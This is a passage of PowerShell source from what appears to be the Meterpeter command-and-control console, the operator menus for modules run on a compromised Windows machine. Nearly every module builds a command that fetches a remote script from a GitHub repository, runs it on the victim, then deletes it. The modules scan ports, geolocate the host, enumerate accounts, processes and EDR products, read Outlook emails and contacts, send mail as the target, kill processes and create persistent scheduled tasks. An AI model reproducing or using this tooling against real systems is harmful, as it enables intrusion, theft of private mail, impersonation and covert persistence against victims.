defaulting to '$IpRange' ..\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" - Set scantype (bullet|topports|maxports) : \" -NoNewline\r\n            $ScanType = Read-Host;\r\n           
 If($ScanType -iNotMatch '^(bullet|TopPorts|MaxPorts)$')\r\n            {\r\n               $ScanType = \"topports\"\r\n               Write-Host \"   => Error: wrong scantype, set demo to '$ScanType' ..\" -ForegroundColor Red\r\n            }\r\n\r\n            #Execute command remotely\r\n            Write-Host \" * Scanning '\" -ForegroundColor Green -NoNewline\r\n            Write-Host \"$IpRange\" -ForegroundColor Red -NoNewline\r\n            Write-Host \"' ports\\services!\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/PingSweep.ps1`\" -OutFile `\"`$Env:TMP\\PingSweep.ps1`\"|Out-Null;powershell -File `$Env:TMP\\PingSweep.ps1 -Action PortScan -IpRange `\"$IpRange`\" -ScanType $ScanType -OutPut verbose -Egg True;Remove-Item -Path `$Env:TMP\\PingSweep.ps1 -Force\"\r\n         }\r\n         If($ping_choise -ieq \"Return\" -or $ping_choise -ieq \"cls\" -or $ping_choise -ieq \"Modules\")\r\n         {\r\n            $ping_choise = $null\r\n            $Command = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"GeoLocate\" -or $choise -ieq \"GEO\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n         write-host \"   Geo locate remote host and resolve public ip addr\";\r\n         write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------   -----------                     ------------------\";\r\n         write-host \"   GeoLocate Client GeoLocation using curl   UserLand\";\r\n         write-host \"   ifconfig  Client GeoLocation using ipinfo UserLand\";\r\n         write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Net:Geo> \" -NoNewline -ForeGroundColor Green;\r\n         $Geo_choise = Read-Host;\r\n         If($Geo_choise -ieq \"GeoLocate\")\r\n         {\r\n            
Write-Host \" - Resolve public ip addr? (y|n): \" -NoNewline;\r\n            $PublicIpSettings = Read-Host;\r\n            If($PublicIpSettings -iMatch '^(y|yes)$')\r\n            {\r\n               #Execute command remotely\r\n               Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n               $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\GeoLocation.ps1`\"|Out-Null;powershell -File `$Env:TMP\\GeoLocation.ps1 -HiddeMyAss false;Remove-Item -Path `$Env:TMP\\GeoLocation.ps1 -Force\"\r\n            }\r\n            Else\r\n            {\r\n               #Execute command remotely\r\n               Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n               $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\GeoLocation.ps1`\"|Out-Null;powershell -File `$Env:TMP\\GeoLocation.ps1 -HiddeMyAss true;Remove-Item -Path `$Env:TMP\\GeoLocation.ps1 -Force\"\r\n            }\r\n         }\r\n         If($Geo_choise -ieq \"ifconfig\")\r\n         {\r\n            Write-Host \" - Resolve public ip addr? (y|n) : \" -NoNewline;\r\n            $PublicIpSettings = Read-Host;\r\n            Write-Host \" - Display verbose outputs? 
(y|n): \" -NoNewline;\r\n            $Verboseme = Read-Host;\r\n            If($Verboseme -iMatch '^(y|yes)$')\r\n            {\r\n               $Verboseme = \"true\"\r\n            }\r\n            Else\r\n            {\r\n               $Verboseme = \"false\"            \r\n            }\r\n\r\n            If($PublicIpSettings -iMatch '^(y|yes)$')\r\n            {\r\n               #Execute command remotely\r\n               Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n               $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Get-ComputerGeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\Get-ComputerGeoLocation.ps1`\";powershell -File `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Api 'ifconfig' -Detail $Verboseme -PublicAddr false;Remove-Item -Path `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Force\"\r\n            }\r\n            Else\r\n            {\r\n               #Execute command remotely\r\n               Write-Host \" * Scanning remote host geo location!\" -ForegroundColor Green\r\n               $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Get-ComputerGeoLocation.ps1`\" -OutFile `\"`$Env:TMP\\Get-ComputerGeoLocation.ps1`\";powershell -File `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Api 'ifconfig' -Detail $Verboseme -PublicAddr true;Remove-Item -Path `$Env:TMP\\Get-ComputerGeoLocation.ps1 -Force\"\r\n            }\r\n         }\r\n         If($Geo_choise -ieq \"Return\" -or $Geo_choise -ieq \"cls\" -or $Geo_choise -ieq \"Modules\")\r\n         {\r\n            $Geo_choise = $null\r\n            $Command = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"modules\")\r\n      {\r\n        $Command = $Null;\r\n      }\r\n \r\n    }\r\n\r\n    If($Command -ieq \"AdvInfo\" -or $Command -ieq \"adv\")\r\n    {\r\n      write-host \"`n`n   Description:\" -ForegroundColor 
Yellow;\r\n      write-host \"   Advanced info manager\";\r\n      write-host \"`n`n   Modules     Description\" -ForegroundColor green;\r\n      write-host \"   -------     -----------\";\r\n      write-host \"   Accounts    List remote host accounts\";\r\n      write-host \"   RevS`hell    List client shell information\";\r\n      write-host \"   ListAppl    List remote host installed appl\";\r\n      write-host \"   Processes   List remote host processes info\";\r\n      write-host \"   Tasks       List remote host scheduled tasks\";\r\n      write-host \"   Drives      List remote host mounted drives\";\r\n      write-host \"   Browser     List remote host installed browsers\";\r\n      write-host \"   Recent      List remote host recent directory\";\r\n      write-host \"   ListSMB     List remote host SMB names\\shares\";\r\n      write-host \"   StartUp     List remote host startup directory\";\r\n      write-host \"   ListRun     List remote host startup run entries\";\r\n      write-host \"   AntiVirus   Enumerate all EDR Products installed\";\r\n      write-host \"   FRManager   Manage remote 'active' firewall rules\";\r\n      write-host \"   OutLook     Manage OutLook Exchange Email Objects\";\r\n      write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n      write-host \"`n`n :meterpeter:Adv> \" -NoNewline -ForeGroundColor Green;\r\n      $choise = Read-Host;\r\n      ## Running the selected module(s).\r\n      If($choise -ieq \"OutLook\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n         write-host \"   Module to enumerate OutLook Exchange Emails, read their contents\";\r\n         write-host \"   on the terminal console or dump found Email Objects to a logfile.\";\r\n         write-host \"   If SendMail is invoked, the target's address is used as the Sender.\" -ForegroundColor Yellow;\r\n         write-host \"`n`n   Modules   Description                     Privileges Required\" 
-ForegroundColor green;\r\n         write-host \"   -------   -----------                     ------------------\";\r\n         write-host \"   Folders   Display outlook folder names    UserLand\";\r\n         write-host \"   Contacts  Display outlook contacts info   UserLand\";\r\n         write-host \"   Emails    Display outlook email objects   UserLand\";\r\n         write-host \"   SendMail  Send Email using target domain  UserLand\";\r\n         write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Adv:OutLook> \" -NoNewline -ForeGroundColor Green;\r\n         $OutLook_choise = Read-Host;\r\n         If($OutLook_choise -ieq \"Folders\")\r\n         {\r\n            #Execute command remotely\r\n            Write-Host \" * Scanning OutLook for folder names!\" -ForegroundColor Green\r\n            $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Out-Null;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'folders' -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\"   `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\";\r\n         }\r\n         If($OutLook_choise -ieq \"Contacts\")\r\n         {\r\n            Write-Host \" - Max outlook items to display: \" -NoNewline;\r\n            $MaxOfObjectsToDisplay = Read-Host;\r\n            If(-not($MaxOfObjectsToDisplay) -or $MaxOfObjectsToDisplay -ieq $null)\r\n            {\r\n               $MaxOfObjectsToDisplay = \"5\" #Default cmdlet parameter\r\n            }\r\n\r\n            Write-Host \" - Create report logfile? 
(y|n): \" -NoNewline;\r\n            $CreateLogFileSetting = Read-Host;\r\n            If($CreateLogFileSetting -iMatch '^(y|yes)$')\r\n            {\r\n               $CreateLogFileSetting = \"True\"\r\n            }\r\n            Else\r\n            {\r\n               $CreateLogFileSetting = \"False\"            \r\n            }\r\n\r\n            #Execute command remotely\r\n            Write-Host \" * Scanning OutLook for Contact Objects\" -ForegroundColor Green\r\n            $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Out-Null;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'contacts' -maxitems '$MaxOfObjectsToDisplay' -logfile `\"$CreateLogFileSetting`\" -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\"   `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\"\r\n         }\r\n         If($OutLook_choise -ieq \"Emails\")\r\n         {\r\n            Write-Host \" - Max outlook items to display: \" -NoNewline;\r\n            $MaxOfObjectsToDisplay = Read-Host;\r\n            If(-not($MaxOfObjectsToDisplay) -or $MaxOfObjectsToDisplay -ieq $null)\r\n            {\r\n               $MaxOfObjectsToDisplay = \"5\" #Default cmdlet parameter\r\n            }\r\n\r\n            Write-Host \" - Display message <BODY> (y|n): \" -NoNewline;\r\n            $UseVerbose = Read-Host;\r\n            If($UseVerbose -iMatch '^(y|yes)$')\r\n            {\r\n               $UseVerbose = \"True\"\r\n            }\r\n            Else\r\n            {\r\n               $UseVerbose = \"False\"            \r\n            }\r\n\r\n            Write-Host \" - Create report logfile? 
(y|n): \" -NoNewline;\r\n            $CreateLogFileSetting = Read-Host;\r\n            If($CreateLogFileSetting -iMatch '^(y|yes)$')\r\n            {\r\n               $CreateLogFileSetting = \"True\"\r\n            }\r\n            Else\r\n            {\r\n               $CreateLogFileSetting = \"False\"            \r\n            }\r\n\r\n            #Execute command remotely\r\n            Write-Host \" * Scanning OutLook for Email Objects\" -ForegroundColor Green\r\n            $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Out-Null;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'enum' -MaxItems `\"$MaxOfObjectsToDisplay`\" -logfile `\"$CreateLogFileSetting`\" -verb `\"$UseVerbose`\" -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\"   `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\"\r\n         }\r\n         If($OutLook_choise -ieq \"SendMail\")\r\n         {\r\n            #<SendTo>, <SendSubject>, <SendBody>\r\n            Write-Host \" - Send To Email: \" -ForegroundColor Red -NoNewline;\r\n            $SendTo = Read-Host;\r\n            If(-not($SendTo) -or $SendTo -ieq $null)\r\n            {\r\n               write-host \"`n\"\r\n               write-host \"   [Error] Module requires 'SendTo' address!\" -ForegroundColor Red -BackgroundColor Black\r\n               write-host \"   [ inf ] SendTo: 'pedroUbuntui@gmail.com'\" -ForegroundColor DarkGray\r\n               $OutLook_choise = $null\r\n               $Command = $null\r\n            }\r\n            Else\r\n            {\r\n               Write-Host \" - Email Subject: \" -NoNewline;\r\n               $SendSubject = 
Read-Host;\r\n               If(-not($SendSubject))\r\n               {\r\n                  $SendSubject = \"@Meterpeter C2 v2.10.11 Email\"\r\n               }\r\n\r\n               Write-Host \" - Email Body   : \" -NoNewline;\r\n               $SendBody = Read-Host;\r\n               If(-not($SendBody))\r\n               {\r\n                  $SendBody = \"Testing @Meterpeter C2 SendEmail function ...\"\r\n               }\r\n\r\n               #Double any single quote so it survives the single-quoted arguments built below\r\n               $SendSubject = $SendSubject -replace \"'\",\"''\"\r\n               $SendBody = $SendBody -replace \"'\",\"''\"\r\n\r\n               #Execute command remotely\r\n               Write-Host \" * Send Email using '\" -ForegroundColor Green -NoNewline\r\n               Write-Host \"$Remote_Host\" -ForegroundColor DarkYellow -NoNewline\r\n               Write-Host \"' OutLook!\" -ForegroundColor Green\r\n               $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'send' -SendTo '$SendTo' -SendSubject '$SendSubject' -SendBody '$SendBody' -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\"   `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' is disabled`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\"\r\n            }\r\n         }\r\n         If($OutLook_choise -ieq \"Return\" -or $OutLook_choise -ieq \"cls\" -or $OutLook_choise -ieq \"Modules\")\r\n         {\r\n            $OutLook_choise = $null\r\n            $Command = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Accounts\" -or $choise -ieq \"acc\")\r\n      {\r\n         write-host \" * Listing remote accounts.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n         $Command = \"Get-WmiObject Win32_UserAccount -filter 'LocalAccount=True'| 
Select-Object Name,SID,PasswordRequired,PasswordChangeable|Format-Table -AutoSize|Out-File users.txt;Start-Sleep -Seconds 1;`$Out = Get-Content users.txt|Select -Skip 1|Select -SkipLast 2;If(-not(`$Out)){echo `\"   `> Error: cmdlet cannot retrieve remote host accounts ..`\"}Else{echo `$Out};Remove-Item -Path users.txt -Force\"\r\n      }\r\n      If($choise -ieq \"RevShell\" -or $choise -ieq \"Shell\")\r\n      {\r\n         write-host \" * Enumerating shell privileges.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n         $Command = \"echo `\"   Client pid   : `$pid `\" `> Priv.txt;`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\"   Client priv  : *ADMINISTRATOR*`\" `>`> Priv.txt}Else{echo `\"   Client priv  : USERLAND`\" `>`> Priv.txt};`$Manufacturer = (Get-WmiObject Win32_OperatingSystem).Caption;echo `\"   Client OS    : `$Manufacturer`\" `>`> Priv.txt;`$ClientShell = (Get-location).Path;echo `\"   Client path  : `$ClientShell`\" `>`> Priv.txt;Get-Content Priv.txt;Remove-Item Priv.txt -Force\"\r\n      }\r\n      If($choise -ieq \"ListAppl\" -or $choise -ieq \"appl\")\r\n      {\r\n         write-host \" * List applications installed (64-bit and 32-bit uninstall keys).\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n         $Command = \"Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*,HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Where-Object{`$_.DisplayName} | Select-Object DisplayName,DisplayVersion | Sort-Object DisplayName | Format-Table -AutoSize\";\r\n      }\r\n      If($choise -ieq \"Processes\" -or $choise -ieq \"proc\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n         write-host \"   Manage remote processes\";\r\n         write-host \"`n`n   Modules    Description                        Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------    -----------                        ------------------\";\r\n         write-host \"   Check      List Remote Process(es) Running    
UserLand\";\r\n         write-host \"   Query      Process name verbose information   UserLand\";\r\n         write-host \"   DllSearch  List DLLs loaded by processes      UserLand\";\r\n         write-host \"   Kill       Kill Remote Process From Running   \" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Return     Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Adv:Proc> \" -NoNewline -ForeGroundColor Green;\r\n         $wifi_choise = Read-Host;\r\n         If($wifi_choise -ieq \"Query\")\r\n         {\r\n            Write-Host \" - Query process name: \" -NoNewline -ForeGroundColor Red;\r\n            $Proc_name = Read-Host;\r\n            If(-not ($proc_name) -or $Proc_name -ieq \" \")\r\n            {\r\n               write-host \"`n`n   Error: We need to provide a process name ..`n\" -ForegroundColor Red\r\n               $Command = $Null;\r\n               $Proc_name = $Null;\r\n            }\r\n            Else\r\n            {\r\n               $Command = \"`$ProcessId = (Get-Process -Name `\"$Proc_name`\").Id;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetProcess.ps1`\" -OutFile `\"`$Env:TMP\\GetProcess.ps1`\"|Unblock-File;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Get-TokenPrivs.ps1`\" -OutFile `\"`$Env:TMP\\Get-TokenPrivs.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\GetProcess.ps1`\" -GetProcess Enum -ProcessName `\"$Proc_name`\" -verb true -exclude 'false';powershell -File `\"`$Env:TMP\\Get-TokenPrivs.ps1`\" -ProcID `$ProcessId;Remove-Item -Path `$Env:TMP\\Get-TokenPrivs.ps1 -Force;Remove-Item -Path `$Env:TMP\\GetProcess.ps1 -Force\";\r\n            }\r\n         }\r\n         If($wifi_choise -ieq \"DllSearch\")\r\n         {\r\n            write-host \" * List DLL's loaded by processes.`n\" -ForegroundColor Green\r\n            $Command = \"iwr -uri 
`\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/DLLSearch.ps1`\" -OutFile `\"`$Env:TMP\\DLLSearch.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\DLLSearch.ps1`\" -filter 'all';Remove-Item -Path `$Env:TMP\\DLLSearch.ps1 -Force\";         \r\n         }\r\n         If($wifi_choise -ieq \"Check\")\r\n         {\r\n            write-host \" * List remote processe(s) running.\" -ForegroundColor Green\r\n            write-host \"   => Exclude: wlanext|svchost|RuntimeBroker`n\" -ForegroundColor Yellow\r\n            \r\n            Start-Sleep -Seconds 1\r\n            $Command = \"Get-Process|Select-Object Id,ProcessName,Description,ProductVersion|Where-Object{`$_.ProcessName -iNotMatch '(wlanext`|svchost`|RuntimeBroker)'}|Format-Table -AutoSize|Out-File dellog.txt;`$check_tasks = Get-content dellog.txt;If(-not(`$check_tasks)){echo `\"   cmdlet failed to retrieve processes List ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}Else{Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n         }\r\n         If($wifi_choise -ieq \"kill\")\r\n         {\r\n\r\n            Write-Host \" - kill [N]ProcessName or [P]PID: \" -NoNewline -ForegroundColor Red\r\n            $KillChoise = Read-Host\r\n            If(-not($KillChoise) -or $KillChoise -iMatch '(n|ProcessName)')\r\n            {\r\n               Write-Host \" - The process name to kill     : \" -ForegroundColor Red -NoNewline\r\n               $Proc_name = Read-Host\r\n               If(-not ($proc_name) -or $Proc_name -ieq \" \")\r\n               {\r\n                  write-host \"`n   `> Error: We need to provide a process name ..`n\" -ForegroundColor Red\r\n                  $Command = $Null;\r\n                  $Proc_name = $Null;\r\n               }\r\n               Else\r\n               {\r\n                  write-host \" * Killing $Proc_name remote process.\" -ForegroundColor Green;\r\n                  If($Proc_name -iMatch '(.exe)$'){$Proc_name = 
$Proc_name -replace '.exe',''};Start-Sleep -Seconds 1;write-host \"\";\r\n                  $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/killProcess.ps1`\" -OutFile `\"`$Env:TMP\\killProcess.ps1`\"|Unblock-File;powershell -file `\"`$Env:TMP\\killProcess.ps1`\" -Proc_name $Proc_name -ppid false -dontkill `\"`$PID`\";Remove-Item -Path `\"`$Env:TMP\\killProcess.ps1`\" -Force\"\r\n               }\r\n            }\r\n            Else\r\n            {\r\n               Write-Host \" - PID of the process to kill   : \" -ForegroundColor Red -NoNewline\r\n               $Proc_name = Read-Host\r\n               If(-not ($proc_name) -or $Proc_name -ieq \" \")\r\n               {\r\n                  write-host \"`n   Error: We need to provide a process PID ..`n\" -ForegroundColor Red\r\n                  $Command = $Null;\r\n                  $Proc_name = $Null;\r\n               }\r\n               Else\r\n               {\r\n                  write-host \" * Killing $Proc_name remote process PID.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n                  $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/killProcess.ps1`\" -OutFile `\"`$Env:TMP\\killProcess.ps1`\"|Unblock-File;powershell -file `\"`$Env:TMP\\killProcess.ps1`\" -Proc_name false -ppid $Proc_name;Remove-Item -Path `\"`$Env:TMP\\killProcess.ps1`\" -Force\"        \r\n               }\r\n            }\r\n         }\r\n         If($wifi_choise -ieq \"Return\" -or $wifi_choise -ieq \"return\" -or $wifi_choise -ieq \"cls\" -or $wifi_choise -ieq \"Modules\" -or $wifi_choise -ieq \"modules\")\r\n         {\r\n            $wifi_choise = $null\r\n            $Command = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"tasks\")\r\n      {\r\n         write-host \"`n`n   Warnning:\" -ForegroundColor Yellow;\r\n         write-host \"   In some targets schtasks service is configurated\";\r\n         
write-host \"   To not run any task IF connected to the battery\";\r\n         write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------   -----------                     ------------------\";\r\n         write-host \"   Check     Retrieve Schedule Tasks         UserLand\";\r\n         write-host \"   Query     Advanced Info Single Task       UserLand\";\r\n         write-host \"   RunOnce   Create a new remote task        UserLand\";\r\n         write-host \"   LoopExec  Create a new remote task        UserLand\";\r\n         write-host \"   Delete    Delete Remote-Host Single Task  UserLand\";\r\n         write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Adv:Tasks> \" -NoNewline -ForeGroundColor Green;\r\n         $my_choise = Read-Host;\r\n         If($my_choise -ieq \"Check\")\r\n         {\r\n            write-host \"\"\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"check`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n         }\r\n         If($my_choise -ieq \"Query\")\r\n         {\r\n            write-Host \" - Input TaskName: \" -NoNewline -ForegroundColor Red\r\n            $TaskName = Read-Host\r\n\r\n            If(-not($TaskName))\r\n            {\r\n               $TaskName = \"MeterpeterC2\"\r\n               write-host \"   => Wrong setting, set taskname to: $TaskName\" -ForegroundColor Red\r\n            }\r\n\r\n            write-host \"`n\"\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"query`\" -taskname 
`\"$TaskName`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n         }\r\n         If($my_choise -ieq \"RunOnce\")\r\n         {\r\n            write-Host \" - Input TaskName to create: \" -NoNewline -ForegroundColor Red\r\n            $TaskName = Read-Host\r\n            If(-not($TaskName))\r\n            {\r\n               $TaskName = \"MeterpeterC2\"\r\n               write-host \"   => Wrong setting, set TaskName to: $TaskName\" -ForegroundColor Red               \r\n            }\r\n\r\n            write-Host \" - Input StartTime (13:45) : \" -NoNewline\r\n            $StartTime = Read-Host\r\n            If(-not($StartTime))\r\n            {\r\n               $StartTime = \"13:45\"\r\n               write-host \"   => Wrong setting, set starttime to: $StartTime\" -ForegroundColor Red\r\n            }\r\n\r\n            write-Host \" - Input Command|BinaryPath: \" -NoNewline\r\n            $Execute = Read-Host\r\n            If(-not($Execute))\r\n            {\r\n               $Execute = \"cmd /R start calc.exe\"\r\n               write-host \"   => Wrong setting, set Execute to: $Execute\" -ForegroundColor Red                   \r\n            }\r\n\r\n            write-host \"\"\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"RunOnce`\" -TaskName `\"$TaskName`\" -StartTime `\"$StartTime`\" -Execute `\"$Execute`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n         }\r\n         If($my_choise -ieq \"LoopExec\")\r\n         {\r\n            write-Host \" - Input Task Name to create   : \" -NoNewline -ForegroundColor Red\r\n            $TaskName = Read-Host;\r\n            If(-not($TaskName))\r\n            {\r\n               $TaskName = \"MeterpeterC2\"\r\n               write-host \"   => Wrong setting, set TaskName to: $TaskName\" 
-ForegroundColor Red                \r\n            }\r\n\r\n            write-Host \" - Execute task after (minuts) : \" -NoNewline\r\n            $Interval = Read-Host\r\n            If(-not($Interval))\r\n            {\r\n               $Interval = \"10\"\r\n               write-host \"   => Wrong setting, set Interval to: $Interval\" -ForegroundColor Red                 \r\n            }\r\n\r\n            write-Host \" - Task Duration (1 TO 9 Hours): \" -NoNewline\r\n            $Duration = Read-Host\r\n            If(-not($Duration))\r\n            {\r\n               $Duration = \"1\"\r\n               write-host \"   => Wrong setting, set Duration to: $Duration\" -ForegroundColor Red      \r\n               \r\n            }\r\n\r\n            write-Host \" - Input Command|Binary Path   : \" -NoNewline -ForegroundColor Red\r\n            $Execute = Read-Host\r\n            If(-not($Execute))\r\n            {\r\n               $Execute = \"cmd /R start calc.exe\"\r\n               write-host \"   => Wrong setting, set Execute to: $Execute\" -ForegroundColor Red                   \r\n            }\r\n\r\n            write-host \"`n\"\r\n            $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"LoopExec`\" -TaskName `\"$TaskName`\" -Interval `\"$Interval`\" -Duration `\"$Duration`\" -Execute `\"$Execute`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n         }\r\n         If($my_choise -ieq \"Delete\")\r\n         {\r\n           write-Host \" - Input TaskName: \" -NoNewline -ForeGroundColor Red\r\n           $TaskName = Read-Host\r\n\r\n           If(-not($TaskName))\r\n           {\r\n              $TaskName = \"MeterpeterC2\"\r\n               write-host \"   => Wrong setting, set TaskName to: $TaskName\" -ForegroundColor Red                \r\n           }\r\n\r\n           
write-host \"`n\"\r\n           $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"Delete`\" -TaskName `\"$TaskName`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n         }\r\n         If($my_choise -ieq \"Return\" -or $my_choise -ieq \"cls\" -or $my_choise -ieq \"Modules\" -or $my_choise -ieq \"clear\")\r\n         {\r\n           $Command = $Null;\r\n           $my_choise = $Null;\r\n         }\r\n       }\r\n      If($choise -ieq \"Drives\" -or $choise -ieq \"driv\")\r\n      {\r\n         write-host \" * List mounted drives.`n\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n         $Command = \"`$PSVERSION = (`$Host).version.Major;If(`$PSVERSION -gt 5){Get-PSDrive -PSProvider 'FileSystem'|Select-Object Root,CurrentLocation,Used,Free|ft|Out-File dellog.txt}Else{Get-Volume|Out-File dellog.txt};Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n      }\r\n      If($choise -ieq \"Browser\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n         write-host \"   Enumerates remote host default browsers\\versions\";\r\n         write-host \"   Supported: Ie,Edge,Firefox,Chrome,Opera,Safari,Brave\" -ForeGroundColor yellow;\r\n         write-host \"`n`n   Modules     Description                     Privileges Required\" 